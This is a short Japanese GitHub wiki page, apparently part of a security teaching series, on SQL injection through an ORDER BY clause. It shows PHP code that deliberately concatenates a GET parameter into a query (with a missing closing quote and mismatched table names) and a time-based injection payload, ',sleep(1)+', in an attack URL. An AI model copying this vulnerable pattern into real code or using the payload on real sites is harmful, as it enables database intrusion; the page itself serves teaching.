SQLインジェクション 04 - yujitounai/helloworld GitHub Wiki

SQLインジェクション-04

order by のSQLインジェクション

脆弱なソースコード (PHP)

$order = filter_input(INPUT_GET,"order");
$sql = "SELECT * FROM users order by bulletins.id ".$order." limit 0 ,5;
$stmt = $pdo->prepare($sql);
$stmt->execute();
$bulletins = $stmt->fetchAll();

攻撃方法

/index.php?&order=,sleep(1)+